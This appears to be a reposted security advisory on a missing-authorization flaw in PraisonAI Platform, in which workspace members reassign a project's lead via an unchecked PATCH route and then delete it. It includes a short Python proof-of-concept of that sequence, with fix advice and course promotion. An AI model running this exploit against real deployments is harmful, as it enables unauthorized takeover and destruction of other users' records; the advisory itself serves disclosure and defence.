Listen to this Post
PraisonAI Platform contains an authorization flaw where ordinary workspace members can modify owner-created project, issue, and agent records through unchecked PATCH update routes. Although delete endpoints correctly enforce strict owner or administrator permissions, the application fails to apply corresponding ownership checks on mutation endpoints. Specifically, for projects, an attacker with basic workspace member access can invoke the patch endpoint to reassign the project lead identifier to their own user account. Once this ownership parameter is mutated, the security guard on the delete route is successfully bypassed, permitting the unauthorized deletion of critical workspace resources and resulting in data integrity violations.
DailyCVE Form:
Platform: PraisonAI Platform
Version: <= 0.1.8
Vulnerability : Missing Authorization
Severity: High
date: 2026-10-07
Prediction: 2026-10-14
What Undercode Say:
The core vulnerability arises from a semantic disconnect between membership checks and resource ownership verification within API dependencies. While routes responsible for resource deletion enforce strict checks like require_delete_permission, the update endpoints rely solely on require_workspace_member. This discrepancy enables attackers to manipulate mutable resource properties—such as project leads—to escalate privileges locally within the same workspace boundary without crossing tenant isolations.
Exploit: (Educational Purposes!)
async def exploit_flow(client, workspace_id, project_id, member_id, member_headers):
Direct deletion is blocked with 403 Forbidden
direct_delete = await client.delete(
f"/api/v1/workspaces/{workspace_id}/projects/{project_id}",
headers=member_headers,
)
Mutate project ownership via unchecked PATCH route
patch_resp = await client.patch(
f"/api/v1/workspaces/{workspace_id}/projects/{project_id}",
json={"lead_id": member_id, "lead_type": "member"},
headers=member_headers,
)
Subsequent deletion succeeds following the ownership takeover
takeover_delete = await client.delete(
f"/api/v1/workspaces/{workspace_id}/projects/{project_id}",
headers=member_headers,
)
Protection:
Implement strict resource-specific update authorization guards mirroring delete-level permission checks across all PATCH endpoints. Prevent ordinary workspace members from modifying ownership fields such as project lead identifiers or creator references. Ensure that role validation logic explicitly verifies whether the authenticated caller owns the target object or holds administrative privileges prior to executing database write operations.
Impact:
Ordinary workspace members can subvert access controls to overwrite sensitive attributes of owner-created resources, reassign project leadership, and bypass delete restrictions. This leads to severe data integrity loss, unauthorized record destruction, and operational disruption across shared collaborative environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

